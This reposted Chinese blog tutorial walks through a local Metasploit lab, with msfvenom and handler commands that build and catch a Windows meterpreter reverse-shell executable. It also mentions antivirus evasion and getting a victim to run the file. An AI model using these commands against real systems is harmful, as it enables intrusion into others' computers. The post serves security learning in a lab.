Tips:转载自作者TedLau_R 前段时间学了msf的一些基础知识,正好有时间了,在本地搭建好了环境,准备练练手。(Tips:请勿用作非法用途,仅供学术交流) 那么首先先介绍一下msf吧 Metasploit Framework (MSF)是2003 年以开放源代码方式发布、可自由获取的开发框架,这个环境为xx测试、shellcode 编写和漏洞研究提供了一个可靠的平台。它集成了各平台上常见的溢出漏洞和流行的shellcode,并且不断更新,最新版本的MSF 包含了180多种当前流行的操作系统和应用软件的exploit,以及100多 个shellcode。作为安全工具,它在安全检测中起到不容忽视的作用,并为漏洞自动化探测和及时检测系统漏洞提供有力的保障。

IP地址

kali:192.168.83.128 靶机:192.168.83.129

step1-生成Trojan horse

今天需要使用到msfvenom来生成Trojan horse。 基础用法 -p, --payload <payload> 使用Trojan horse负荷。指定一个'-'或者输入(stdin)用户自定义的payloads(Trojan horse负荷)。 -f, --format <format> 输出格式(使用 --help-formats来查看变量格式列表) -o,--out <path> 保存***负荷(payload) 在此次实验中命令为: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.83.128 LPORT=4444 -f exe -o payload.exe 这里的LHOST为kali的IP,LPORT自然为kali的端口。 在这里插入图片描述 ok,生成成功。

step2-将Trojan horse传入到靶机

这一步就要靠自己的技巧了,而在这里我是在本地进行试验(ps:自行试验时目标主机必须得关闭安全防护比如防火墙,360等等,如果没关,则需要对Trojan horse进行免杀处理,Trojan horse才能成功运行) 在这里插入图片描述

step3-使用msf侦听

在这里插入图片描述 use exploit/mulit/handler set payload windows/meterpreter/reverse_tcp set LHOST 192.168.83.128 //kali的ip set LPORT 4444 //kali的端口 run

step4-运行Trojan horse

这一步是通过你自己的技术,使对方运行你的Trojan horse,由于我是在本地试验,就不赘述了。

step5-获取shell

当对方成功运行Trojan horse之后,就会反弹一个shell。 在这里插入图片描述 在meterpreter后输入shell即可获取目标靶机的一个shell (类似于cmd,可以执行系统命令) 在这里插入图片描述 本次试验到此结束,再次提醒请勿用作非法用途,如有表达不周,烦请不吝赐教。非常感谢!